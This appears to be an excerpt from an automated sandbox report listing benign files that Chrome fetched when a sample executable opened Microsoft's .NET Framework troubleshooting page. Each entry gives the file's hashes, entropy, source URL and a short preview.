                                                                                                                                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13842
                                                                                                                                                                                                Entropy (8bit):7.802399161550213
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4897
                                                                                                                                                                                                Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):47062
                                                                                                                                                                                                Entropy (8bit):5.016115705165622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):3130
                                                                                                                                                                                                Entropy (8bit):4.790069981348324
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):18367
                                                                                                                                                                                                Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13339
                                                                                                                                                                                                Entropy (8bit):7.683569563478597
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):18367
                                                                                                                                                                                                Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1154
                                                                                                                                                                                                Entropy (8bit):4.59126408969148
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3130
                                                                                                                                                                                                Entropy (8bit):4.790069981348324
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                Entropy (8bit):7.784472070227724
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):464328
                                                                                                                                                                                                Entropy (8bit):5.074669864961383
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):207935
                                                                                                                                                                                                Entropy (8bit):5.420780972514107
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):18477
                                                                                                                                                                                                Entropy (8bit):5.147347768532056
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):207935
                                                                                                                                                                                                Entropy (8bit):5.420780972514107
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
